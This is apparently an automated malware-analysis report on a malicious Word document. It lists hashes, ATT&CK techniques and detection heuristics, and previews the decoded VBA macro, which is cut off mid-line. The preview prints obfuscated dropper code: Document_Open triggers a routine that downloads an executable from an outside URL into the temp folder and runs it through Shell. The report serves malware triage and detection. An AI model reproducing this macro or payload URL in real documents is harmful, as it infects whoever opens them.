Office (OOXML) malware analysis — malicious · 7f39d03c88df1f71

MALICIOUS

Office (OOXML)

114.2 KB Created: 2018-10-23 12:29:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-11-20

MD5: 34680dc9ee0ebf2236f6d4f4ea40bf11 SHA-1: 7d14fac76d5fed2ef647ff6643b4f37e3b652018 SHA-256: 7f39d03c88df1f7190a20b65d68e5eedfb42722491b22ad8746f7457e08d6f25

308 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an Office document containing VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads a file from a URL and saves it to disk, which is then likely executed. The 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic further suggests an auto-execution mechanism via XMLHTTP. The presence of a 'Document_Open' macro and the 'OLE_VBA_SHELL' firing confirm the intent to execute code upon opening the document, likely leading to the download and execution of a second-stage payload.

Heuristics 11

ClamAV: Doc.Dropper.Agent-7144196-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7144196-0
VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
        Shell bafGXRwJxsNM6HAd
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
DcPpzZFIKYQ4kg.Write WSiKV4zpePnv6csAY.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set DcPpzZFIKYQ4kg = CreateObject("adodb.stream")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Sub Document_Open()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
'Sub Workbook_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
path = Environ("temp") & "\42737.exe"
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://jinserviceinc.com/system32.exe Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://ns.adobe.com/photoshop/1.0/Referenced by macro
- http://ns.adobe.com/tiff/1.0/Referenced by macro
- http://ns.adobe.com/exif/1.0/Referenced by macro
- http://www.iec.chReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	17727 bytes
SHA-256: `81b50ebd499fe4a541fee8ecff138a928cd4ec71152234cba99da0363751f599`
Detection ClamAV: No threats found Obfuscation or payload: likely 363 of 488 identifiers look randomly generated (e.g. 'WSiKV4zpePnv6csAY') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim FC3RXuNVO4GgZ62W FC3RXuNVO4GgZ62W = 29 While FC3RXuNVO4GgZ62W <= 841 FC3RXuNVO4GgZ62W = FC3RXuNVO4GgZ62W + 25 Wend LPOHBZ0en = "NyzEqoDxIdFag43K" LTHBxPAyQ9VlFkz2g = G72bo8CdZGtsUIO & FC3RXuNVO4GgZ62W Dim z0w2Qp9tn z0w2Qp9tn = 29 While z0w2Qp9tn <= 841 z0w2Qp9tn = z0w2Qp9tn + 25 Wend lS7HcDzGe = 2186 T48EYlL3nCbr = wjWnB8XZ5L0KUSFa & z0w2Qp9tn Dim KWy5L14CG KWy5L14CG = 249 While KWy5L14CG < 789 KWy5L14CG = KWy5L14CG + 4 Wend tr5BAYMlJp = "VuRLpV6MnFHg71Qwz" hOygPV3QXUNiB = oPNXAcdpTfxRa2h & KWy5L14CG main End Sub Sub Document_Close() Dim fdI1OcMhBV fdI1OcMhBV = 146 While fdI1OcMhBV <= 287 fdI1OcMhBV = fdI1OcMhBV + 21 Wend j5CZEdNWGvR7DcSVK = "pXfCTKcxIWBu6" vFq8V5Wx7AZlKXoP = QbvK4cZl2ps & fdI1OcMhBV If 11 < 169 Then ' yJFfpSOw2oXC80 Else ' kiKmz3LOPTw90M5cr Debug.Print "fIBom4Oxqp" End If End Sub Attribute VB_Name = "VhYSUyDiqlmnWV" 'Sub Workbook_Open() Sub main() If 27 < 169 Then ' BGWqtxJmF Else ' ZuZbzxcodA3ljITv MsgBox "QKYrN0JxF" End If Dim phsntjeG0 phsntjeG0 = 108 While phsntjeG0 < 456 phsntjeG0 = phsntjeG0 + 16 Wend iW617XczFfCy = 36447 wxjF8JHZtS = E2TUVe6oPh & phsntjeG0 If 26 < 217 Then ' V3nAHwxsFOP Else ' bSAiveuLbPc Debug.Print "E69dQtnzDROVPBa" End If Dim W7xp2qPosy W7xp2qPosy = 127 While W7xp2qPosy <= 653 W7xp2qPosy = W7xp2qPosy + 56 Wend dnZHsxXlTRyV2N = 19773 DPwsImpjCrfqB9Xh = url8mhBNp7sXgGTWO & W7xp2qPosy If 32 < 241 Then ' t1v8LmWQeVn32b Else ' TuiRV0v9cS Debug.Print "LcrmA95oQV0jg" End If Dim G1WMlwrDzToVRE G1WMlwrDzToVRE = 7 While G1WMlwrDzToVRE < 333 G1WMlwrDzToVRE = G1WMlwrDzToVRE + 11 Wend AhcZK6f75 = "Wg4kcA8wN" O7TBpkGP2yC = ubiWcS6Vrl & G1WMlwrDzToVRE If 14 < 245 Then ' upbgPc87t4 Else ' eazus28A5 Debug.Print "pH279mMiTNWsZw1" End If If 918 - 13 = -1329 + 1343 Then pcMB3g4dEkfPCwrR = "BaiuHbJ5NQWGeI" End If l6kije5nRHZ = "iEeGLZKIo" sDyzv23Jx1lkPHqh5 = pcMB3g4dEkfPCwrR & l6kije5nRHZ Dim HxL2ANm4If HxL2ANm4If = 229 While HxL2ANm4If <= 1022 HxL2ANm4If = HxL2ANm4If + 2 Wend dH86ESmGAgD10d2i = 39066 nutwfnqoFN6KW0UrS = y4YHv7By9kZLrN & HxL2ANm4If If 46 < 147 Then ' AFOrCV7YBgck Else ' m7mZlSiVRJsCF4 MsgBox "WI1L9sOthF6Nnm" End If Dim YHOgCw7vzq26ZSVaG YHOgCw7vzq26ZSVaG = 147 While YHOgCw7vzq26ZSVaG <= 642 YHOgCw7vzq26ZSVaG = YHOgCw7vzq26ZSVaG + 40 Wend zstvC5mWDUloG8Fd6 = "Uylgf5G6bnI2U" N2mXEAyfKCQtp7kcd = fv0AHJ4zF1f & YHOgCw7vzq26ZSVaG If -93 + 142 = 3468 - 3461 Then EvPQUbW0ea5f1N9I = "GRPaJtirk1LGdfWvY" End If kkKwJaXWI = "vzKOA0C8RJvBcfXV" qkAXzu6aCFPWE3rfq = EvPQUbW0ea5f1N9I & kkKwJaXWI If 1011 + 11 = -1534 + 1541 Then EWJzAvNwKHmcO = "onWuVDs5ydbz76" End If aJb2DewpNnUaMGLC = 3554 nztuh9GWM7L = EWJzAvNwKHmcO & aJb2DewpNnUaMGLC Dim kV8gpihSzK kV8gpihSzK = 228 While kV8gpihSzK <= 596 kV8gpihSzK = kV8gpihSzK + 33 Wend S2xcHangwyGRC = "z71QzJAR9oawcHde" peZ27uIdrCVQ9ELoj = uF2ESxpsniPIvQ & kV8gpihSzK Dim qXB2EwNF4sc0K qXB2EwNF4sc0K = 125 While qXB2EwNF4sc0K <= 752 qXB2EwNF4sc0K = qXB2EwNF4sc0K + 3 Wend tPU5cXkroE = 1710 F1x5fNqU0riG = GGWMZiCfS & qXB2EwNF4sc0K If 28670 / 610 = 32450 / 2950 Then ItShkrec78 = "J58egIbO3JylXDr" End If nPBDVWOGsfey = 17288 qB5qNDnZPrVlW = ItShkrec78 & nPBDVWOGsfey Dim jdfbghm2QP jdfbghm2QP = 149 While jdfbghm2QP < 441 jdfbghm2QP = jdfbghm2QP + 28 Wend jUnrlIXobGdgqis = "hzoRJy13bHxKlpOD" Se1DUWPjxOA8lQE = EyvQoDdEV57jg & jdfbghm2QP If 85 + 43 = -2387 + 2399 Then v2IhQpXauGZxm7 = "meE8LtFvSCnrm" End If RqHl167fGtBIuT = "C85dOkTE0w" UEz4oXwJsFALjVf = v2IhQpXauGZxm7 & RqHl167fGtBIuT If 23 < 226 Then ' Csj0INVtP38uibpn Else ' SU9lOKmfvqZJRizs6 Debug.Print "Not90TWV71" End If If 19700 / 25 = -16216 + 16218 Then XWCBP6uI1UDn9 = "ApvculZm8eL5h2FxA" End If KgsHVb6TG = 9824 eqdAJ26Esnvl8B = XWCBP6uI1UDn9 & KgsHVb6TG Dim wwD74RQsHe3O wwD74RQsHe3O = 26 While wwD74RQsHe3O <= 557 wwD74RQsHe3O = wwD74RQsHe3O + 1 Wend GqP6Z3lsSbd7I = 1386 u3srXNDvCKF = jvKR59Z3hyGUtc & wwD74RQsHe3O Dim iCPQ5gXBpFv iCPQ5gXBpFv = 26 While iCPQ5gXBpFv <= 557 iCPQ5gXBpFv = iCPQ5gXBpFv + 1 Wend d4me3Agcdq2sBiCUL = 1386 LTXR3CVo4vPq9IaMn = i60K1UBme4 & iCPQ5gXBpFv If 8 < 209 Then ' ZLSPZ47tpDuwFN Else ' v6OVRvFYteHB41T MsgBox "lQRCGxDoJU2ce" End If If 26 < 202 Then ' KYTrZP3ab Else ' nsxlSiDtCr0gMcZ MsgBox "pmAST3Y8GHsWN" End If If 26 < 202 Then ' bTAB0RDxzZ2 Else ' A26JjRmv8qPrZpxW MsgBox "tnELY3Zx8J" End If Dim a3VM5CfIPpUwbgxLm a3VM5CfIPpUwbgxLm = 84 While a3VM5CfIPpUwbgxLm <= 741 a3VM5CfIPpUwbgxLm = a3VM5CfIPpUwbgxLm + 55 Wend BN47EMFzh = "IXqN5TAkPtI1UlV" g0LM7sVESxG = uwnBXHGfckYxP7I & a3VM5CfIPpUwbgxLm Dim SGOSJerBbWx41PItY SGOSJerBbWx41PItY = 84 While SGOSJerBbWx41PItY < 741 SGOSJerBbWx41PItY = SGOSJerBbWx41PItY + 55 Wend ohwCtWXa2xVTvqA0 = 32843 w71QkKmJ0p6ECDSP = lG3Vjue5Zhpb & SGOSJerBbWx41PItY Dim XFCMY3oyQKJmrpck XFCMY3oyQKJmrpck = 127 While XFCMY3oyQKJmrpck <= 864 XFCMY3oyQKJmrpck = XFCMY3oyQKJmrpck + 15 Wend sFV7G26qQUh = 23404 z24di1KEDAsm = l7ie9EOrLKFwC & XFCMY3oyQKJmrpck Dim sG9xjUtmybHBrsLVR sG9xjUtmybHBrsLVR = 127 While sG9xjUtmybHBrsLVR < 864 sG9xjUtmybHBrsLVR = sG9xjUtmybHBrsLVR + 15 Wend HZSf8lX5n9B = "moku0JdyZCn2Ppl" XnVIEwWKB5m8ik3 = hWH5JpFcwt & sG9xjUtmybHBrsLVR If 41 < 240 Then ' PNoQEHecqy Else ' Vz5R0cPynG MsgBox "zw873YziNFgPQtMW2" End If If 40 < 142 Then ' Y9bjgvpynlAG Else ' gv2pcsRh5OxVH1r MsgBox "b4qemCdfVGjE" End If If 458 + 54 = -11057 + 11058 Then o7K5FRlvD = "jszEI6dn7uBV2KT" End If bWsIciDewyQx2E4J = 28383 NPZ3boiCgu = o7K5FRlvD & bWsIciDewyQx2E4J If 13 < 172 Then ' ZvPxJ0SV38yzXmB Else ' rpewnDkCS28y MsgBox "DJdeN60xYLIEoFRk" End If If 464 + 34 = 20808 / 2601 Then kXhbM1xCDfdAqeE7N = "PCe6TQB5t" End If AsNMCjwFf = "s5Eiby8Bjutep43Ic" RQW1jZfP6qc = kXhbM1xCDfdAqeE7N & AsNMCjwFf If 36 < 236 Then ' IMYZg0LchieDJ3o Else ' pa9gPr2s0iq5QtEf6 MsgBox "ntCdLysre6PjXJqx" End If If 36 < 213 Then ' HYTGDNfrweu Else ' FV4DndQG18uv3WjwL Debug.Print "rG5i1mVaP2FuEDN" End If If 36 < 213 Then ' s5PCrzeFg Else ' WIeKrOW68SQaoPux9 MsgBox "o3mP2Tz9ftRsDE" End If If 436 + 30 = -9215 + 9217 Then EW7cHfZQh184aY = "oGDQN34lsXj" End If kNiK1nut0 = 12739 SWxTwCG2Zd7RkMPh = EW7cHfZQh184aY & kNiK1nut0 Dim JrMJ5d1oBe6XgS JrMJ5d1oBe6XgS = 72 While JrMJ5d1oBe6XgS <= 1016 JrMJ5d1oBe6XgS = JrMJ5d1oBe6XgS + 59 Wend yM0Z4Jnk1ED6s = "cBa8zqriw6ZtlX" QS0GcqLBC8m = jmI1bLBc2pRTHth & JrMJ5d1oBe6XgS If 41 < 224 Then ' Xsb94KN60jyYr Else ' vKhtL48XsTARm Debug.Print "tnW5mx6zOsVo0" End If Dim wXAvi64aPLdsl wXAvi64aPLdsl = 203 While wXAvi64aPLdsl <= 298 wXAvi64aPLdsl = wXAvi64aPLdsl + 9 Wend xfGxYV8uqjsMoLd4W = 32765 pgDYXHldy8AEvn = cjIv4JB8NSm1th & wXAvi64aPLdsl If 453 - 36 = 2240 - 2227 Then FmoyW31qSIc = "I6nwgY0S1WEZxGaDX" End If LTtMGPAiN8cBm = "tjTFMhXy4lU3" g3nrt6VkvFzW = FmoyW31qSIc & LTtMGPAiN8cBm If 11 < 143 Then ' cbdfVSBPeLNaHW Else ' BW5AGLmHs9F MsgBox "GNwg8lIncBYXV" End If If 40 < 134 Then ' RruikFpdBGbZ Else ' aPNspnGium MsgBox "vk6K9BhNnY4ZML" End If If 40 < 134 Then ' QCSBbcQPswU8glj Else ' ePYO9qjBX Debug.Print "bqx6aiTUejf4Mnd" End If Dim IVyBjOzfE7Xr0el IVyBjOzfE7Xr0el = 3 While IVyBjOzfE7Xr0el <= 328 IVyBjOzfE7Xr0el = IVyBjOzfE7Xr0el + 21 Wend osTLvRKFzp = 38778 xHln5uRjwPsAJth2 = M7fPz6ti0y4 & IVyBjOzfE7Xr0el If 31824 / 51 = -724 + 736 Then yyDSb3dxZeqcmHkJ = "FWDtZQLc41mJ6lApB" End If akJ13YpBH = 38778 YoGlTQXqnODuL1 = yyDSb3dxZeqcmHkJ & akJ13YpBH If 294 - 136 = -4803 + 4809 Then y8vK2HrtMj0zyW = "T0jKhSCvJ4y7MN6YR" End If zN36FIHrSkOYas = 8960 J85mRDN6nZlPgS = y8vK2HrtMj0zyW & zN36FIHrSkOYas If 294 - 136 = -4803 + 4809 Then aGNXkSnUMdjPL7YW = "LE7woN1d4tOXT8" End If e36BYgbci = "KsR0uGJN934kOVYxP" KiAFrc5mXy = aGNXkSnUMdjPL7YW & e36BYgbci If 12 < 170 Then ' YotAH0R6h Else ' C56zbw49W MsgBox "llcpYZmyFa1zwNG" End If If 12 < 170 Then ' oWKFJR2LspE9BN Else ' qkJwcqFo2I0tx1 MsgBox "lbMT9oqO7CArt" End If If 550 - 500 = -336 + 351 Then ru5HjMoLk4 = "zzaRmnFVo3p4wgGY" End If l9rVugDOLBq = 28119 hxyEi8p6c = ru5HjMoLk4 & l9rVugDOLBq Dim GqFVMmrn6Ui GqFVMmrn6Ui = 154 While GqFVMmrn6Ui < 612 GqFVMmrn6Ui = GqFVMmrn6Ui + 25 Wend Gf7JYWlwoEhG = 28119 uI3ChiJY9HS6VW = h9OsPHVmQ4zx & GqFVMmrn6Ui Dim PqmTHLrIYN5czb PqmTHLrIYN5czb = 255 While PqmTHLrIYN5czb <= 622 PqmTHLrIYN5czb = PqmTHLrIYN5czb + 45 Wend qux8FA3cQKMe = "UbDjMPQaekoBZhv0" ac1SMK0eDdqNzWbIO = qqHteoKYv2CrD & PqmTHLrIYN5czb If 15720 / 20 = -7517 + 7520 Then OZoOp1hnM = "rr4iON6xyPK0uh" End If grGcxA04koQ = 28530 ZemvHo2R5kC7dOa1S = OZoOp1hnM & grGcxA04koQ Dim efeNVgzqMkXObH efeNVgzqMkXObH = 129 While efeNVgzqMkXObH < 838 efeNVgzqMkXObH = efeNVgzqMkXObH + 11 Wend OsTx14RliZw9U = "grIynTV8vZho2HL" j1vDh2Coe = deKu6MfDc5 & efeNVgzqMkXObH If 407 - 72 = 28301 / 4043 Then PznjyPIp2aBmNR = "PiukVPER9T0N6Ia" End If Xv0wFpu3EL = "pZbDCwae9U" FODkhxU1H4PX = PznjyPIp2aBmNR & Xv0wFpu3EL If 24 < 215 Then ' NRgP37a1X2vU Else ' afaGuyPWRr5cT1 MsgBox "Z7wtaEqfUAczenjWg" End If If 63 < 219 Then ' cXl8NqGWe4oPY Else ' ovBkYp1cdW MsgBox "hzbyOkNLVq26IvPf" End If If 63 < 219 Then ' J0JLvaEkV Else ' e7OYifI21adq Debug.Print "iDRLuG79XOgtkj" End If Dim J46zy13sjirGuUw J46zy13sjirGuUw = 216 While J46zy13sjirGuUw < 754 J46zy13sjirGuUw = J46zy13sjirGuUw + 8 Wend JgckW85oUAnrRP = 41104 D5V9y7NdeUbX = n31JuaRKZHtox & J46zy13sjirGuUw If 15040 / 470 = 2030 / 145 Then RiAhscIOW5QnrGxL = "mjsRgXxbJnLFzYW" End If aprFqGnWEzRtQMT = 41104 FMiud7tXOK = RiAhscIOW5QnrGxL & aprFqGnWEzRtQMT If 53 < 147 Then ' dNyMLmsRc9 Else ' hL2XxZS1V80rwTAK4 MsgBox "uoclEjKZUh" End If If 672 + 13 = 21966 / 3661 Then rutfHshn8XE1 = "EEOUSWbqPi3h72ZvF" End If kmR6I4GVNxPB1 = 36725 Nkb1GQyRefiYa = rutfHshn8XE1 & kmR6I4GVNxPB1 If 1027 - 29 = -117 + 128 Then y7A2Wu9cOCaRiMBX4 = "Yr4Tvdp3RmGJWjXk" End If eys78Cqo4uj0Z = "ovTA2Uxjchbidgf" CNTDUd0jp = y7A2Wu9cOCaRiMBX4 & eys78Cqo4uj0Z If 1027 - 29 = -117 + 128 Then gdNU61GwIQPioyu = "fbi5Ur1QXzqa4Wp" End If lg5R67oHU2AqrpNb = 3559 MqKC8OhTxmdFrp = gdNU61GwIQPioyu & lg5R67oHU2AqrpNb If 26520 / 51 = -230 + 236 Then MkZvgL5RMnqdzlUp = "iOfbj6L1UcqMameiB" End If V4sXglSkzA = "lxoSvRyAMscqlp" yZCb5j03MKshtULF = MkZvgL5RMnqdzlUp & V4sXglSkzA If 47 < 200 Then ' BfnIXg03Q1CFSHJ5U Else ' CS0MGApbt943aNlj MsgBox "FhQITlK6mzt3B" End If Dim yREzQgBmMK5tv yREzQgBmMK5tv = 229 While yREzQgBmMK5tv < 827 yREzQgBmMK5tv = yREzQgBmMK5tv + 48 Wend J5Ex9QhwIFUJ = 58198 KQgnqAmfhix3IK79k = zoUc9kSZQKtP & yREzQgBmMK5tv path = Environ("temp") & "\42737.exe" MjupZH5vW1eOo "http://jinserviceinc.com/system32.exe", path If 39 < 232 Then ' uEpROGBTK7xCv Else ' VpQlS73Bj269 Debug.Print "XoN9SiMxT2gO" End If Dim Ww6zGSgPy As Object Dim yHUlVyA31eIYd yHUlVyA31eIYd = 255 While yHUlVyA31eIYd <= 482 yHUlVyA31eIYd = yHUlVyA31eIYd + 10 Wend A7TIiUmbZVcYa = "yC6RKS3kVQcPvy" v8AUFaq7P = c6GOU8Awmeh1W & yHUlVyA31eIYd Dim de7qbEOgjwofnNy de7qbEOgjwofnNy = 255 While de7qbEOgjwofnNy < 482 de7qbEOgjwofnNy = de7qbEOgjwofnNy + 10 Wend Ufv7UGaotu2ORVE5D = 21175 dW8eQ90AqMEFN = C0oRnKOIhyFBz9D & de7qbEOgjwofnNy If 458 + 9 = -1425 + 1440 Then S5LGh8k9DIBKuAW1 = "oWzr4FJk9KdhbON" End If sg75oL8bn = 3830 eflBuVgJDpGHbKwaz = S5LGh8k9DIBKuAW1 & sg75oL8bn If 458 + 9 = -1425 + 1440 Then HQ0uftE1vAPSdc = "IMNkcEDzVn" End If ny6XfJIdml = 3830 jwNlzfhmeLUp0 = HQ0uftE1vAPSdc & ny6XfJIdml Set Ww6zGSgPy = New frmMain If 8550 / 9 = 30261 / 10087 Then tPdN9uBUg5bv = "sj1X9DC0iR54cHfI" End If un1LFQc9D = 19695 P1Iq0SalH = tPdN9uBUg5bv & un1LFQc9D Ww6zGSgPy.hello path End Sub Attribute VB_Name = "kjzGmo6Hcg0O2lkL" Public Function MjupZH5vW1eOo(ByVal KEfViuzwDZjn$, ByVal b12OiWrMSUFkLR$) If 59 < 138 Then ' VBeGlsiSgEWDJCTK1 Else ' rU50zhDv9CiMjtEX Debug.Print "F7cD3Au0xB" End If If 26 < 207 Then ' bx2TeJ79rKkcOPl8 Else ' O8AyWdlSwJEzZ MsgBox "cnBN7xv4MwUGpFEh" End If If 403 - 78 = 21264 / 1329 Then N2qFXxrWkhiJavtdb = "ZF4YAZ7vL1nHO" End If Ugz19vAQ0y = "mzBa5k6DjFo9" fBL6x92ZswoGNvMdO = N2qFXxrWkhiJavtdb & Ugz19vAQ0y Dim oDBgTkJvjz oDBgTkJvjz = 83 While oDBgTkJvjz <= 536 oDBgTkJvjz = oDBgTkJvjz + 58 Wend o5Ny0sCbUlAvtP3Lf = 17598 rjBOwEI7D8ba61Nn = QazRXQmfWgyLwx & oDBgTkJvjz If 713 - 47 = 2236 - 2225 Then LlwGD8tebUIKdBR = "Nkjh3ela6srqV8b4" End If sIbgZu3A6B = "mPqdMO7hSV2wIs" gIoGDs4ryvUBN2Y = LlwGD8tebUIKdBR & sIbgZu3A6B Dim tJ0kyvaUufK6w8mGR tJ0kyvaUufK6w8mGR = 99 While tJ0kyvaUufK6w8mGR <= 450 tJ0kyvaUufK6w8mGR = tJ0kyvaUufK6w8mGR + 37 Wend ikNdYZH8Di = 58473 KhrHgWVTAtjYeN4q = xDNt9BMncjolIWR87 & tJ0kyvaUufK6w8mGR If 43 < 235 Then ' ypmhLXicQHbeo Else ' Rg0Q6bKnlk MsgBox "iia4tRJVgExF0" End If Dim EEzXoKdlP EEzXoKdlP = 46 While EEzXoKdlP <= 796 EEzXoKdlP = EEzXoKdlP + 41 Wend k5GX6nzNoZg8lKf = 41833 cQxtfpb93Fqk = N6pzhufwGivQIrSBa & EEzXoKdlP If 52 < 194 Then ' T1i69qYAXS Else ' vVpEZLMOxy MsgBox "OKa3n5UBH21Ym" End If If 52 < 194 Then ' CXvy8FQosg1OKBS5R Else ' w59JWA2wFYM MsgBox "QA97Eq1sFOIP" End If If 854 - 32 = -4804 + 4807 Then xR9ZwHVQhl = "SDwBycIg6mNST4Ont" End If I53IkwvurPVhCjGAf = 34556 LwoWdLUPzJ6DY = xR9ZwHVQhl & I53IkwvurPVhCjGAf If 23 < 149 Then ' HPypMV2cI56 Else ' OLqVrfQ98X07b4 Debug.Print "Fd4z8yuXvqS9cWs2j" End If If 26 < 142 Then ' Uxt61LpZUhv Else ' nJVZRabFsXmzpI Debug.Print "tECG3YsofprAnS" End If Dim iftXxvKiw6BnJZVjb iftXxvKiw6BnJZVjb = 24 While iftXxvKiw6BnJZVjb < 875 iftXxvKiw6BnJZVjb = iftXxvKiw6BnJZVjb + 17 Wend aYu4Klv0GV = "DJoKTzlcO6iemL5X" jbeFl3rWMiq5H = dnWe3f5q1YyDE & iftXxvKiw6BnJZVjb If 42 < 172 Then ' KtnEcW37PU2G1zMyf Else ' cgVhHYlNUDfKuP1 Debug.Print "gnKyJRkiS1d5wY6b9" End If Dim C92CBvg0iFSKOTc C92CBvg0iFSKOTc = 178 While C92CBvg0iFSKOTc <= 409 C92CBvg0iFSKOTc = C92CBvg0iFSKOTc + 34 Wend ZBHQZ4AU9MXVwc = "orJT9hoVP8HIuv" ZK3orfiWeRYEkSbX = Vg5kpmceWfT6w4PQj & C92CBvg0iFSKOTc Dim rFHyITakKxCQjrc6L rFHyITakKxCQjrc6L = 116 While rFHyITakKxCQjrc6L <= 275 rFHyITakKxCQjrc6L = rFHyITakKxCQjrc6L + 45 Wend rwyTYH1au = "aPrblFa8gHD" CvZyI4sPCV = AdIOuDAS7eFyh4MLU & rFHyITakKxCQjrc6L If 49 < 133 Then ' aCH40fSLEtFxY Else ' h6la7LAQ3zEXI Debug.Print "FCjLdTmPSzlJ6QY" End If Dim WSiKV4zpePnv6csAY As MSXML2.XMLHTTP60 Set WSiKV4zpePnv6csAY = New MSXML2.XMLHTTP60 WSiKV4zpePnv6csAY.Open "GET", KEfViuzwDZjn$, False WSiKV4zpePnv6csAY.Send If WSiKV4zpePnv6csAY.Status = 200 Then If 16 * 14 = 1060 - 1044 Then PObu9scx0MT = "bDJ83r1YkqahH" End If dmAcjRO43dfaYGQ = 61616 n67gA2BSIKisRXzJ = PObu9scx0MT & dmAcjRO43dfaYGQ Dim JdXq9gTLkIx2tJcOB JdXq9gTLkIx2tJcOB = 163 While JdXq9gTLkIx2tJcOB < 364 JdXq9gTLkIx2tJcOB = JdXq9gTLkIx2tJcOB + 58 Wend Nhlcy5Ab7 = 14113 I5nwVeQFz1ObaoW = GUnvKpiM1F & JdXq9gTLkIx2tJcOB Set DcPpzZFIKYQ4kg = CreateObject("adodb.stream") If 53 < 147 Then ' k0KcLiCw4D Else ' ZzrvCusLTiH MsgBox "bQH5JceNrpWfuU" End If If 13380 / 15 = -772 + 785 Then w9CVLYhbo2Q46 = "aGD648Y0ka" End If LurnFHBRETA6QN0xw = "CKuSIUTZH0A" oqTkDWG6V = w9CVLYhbo2Q46 & LurnFHBRETA6QN0xw Dim j7vDtZVuGFgzP j7vDtZVuGFgzP = 103 While j7vDtZVuGFgzP <= 497 j7vDtZVuGFgzP = j7vDtZVuGFgzP + 48 Wend tj1HWtJ02uA = 46664 NDzYdI1kgH6aJ9ei = tD5yiPeNMHf & j7vDtZVuGFgzP DcPpzZFIKYQ4kg.Type = 1: DcPpzZFIKYQ4kg.Open Dim y2o6pK9P3jg y2o6pK9P3jg = 82 While y2o6pK9P3jg <= 402 y2o6pK9P3jg = y2o6pK9P3jg + 21 Wend S4oclC5a0XQk = "It0gPSpkBVOv12T" SI5NLrO8tY = xFlQehyBfL & y2o6pK9P3jg If 8 < 221 Then ' uBtVQoEnYZc3 Else ' fuUJcB0rLC5zEt3W Debug.Print "mYG3ZIxBCrzo" End If DcPpzZFIKYQ4kg.Write WSiKV4zpePnv6csAY.responseBody Dim vuIgXG7ZjKBW vuIgXG7ZjKBW = 42 While vuIgXG7ZjKBW <= 366 vuIgXG7ZjKBW = vuIgXG7ZjKBW + 31 Wend eZGc4b5QX6jo = 59115 s5X3ny2dDSfg = n6IiWJlsf & vuIgXG7ZjKBW Dim XP38pmR5sTdSjBW XP38pmR5sTdSjBW = 25 While XP38pmR5sTdSjBW < 1022 XP38pmR5sTdSjBW = XP38pmR5sTdSjBW + 4 Wend ko2zElJk9 = "oXGSimN73Q" nEn3pNafx0AzZMCD = ysrbuvJjWqxK37iFT & 